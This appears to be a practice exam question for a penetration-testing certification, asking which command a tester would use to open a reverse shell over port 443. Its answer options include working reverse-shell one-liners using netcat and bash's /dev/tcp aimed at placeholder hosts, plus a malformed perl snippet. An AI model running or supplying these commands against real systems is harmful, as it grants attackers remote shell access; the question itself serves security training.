August 13, 2021 by Admin
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
-
perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
-
ssh [email protected]<DESTINATIONIP> -p 443
-
nc -e /bin/sh <SOURCEIP> 443
-
bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1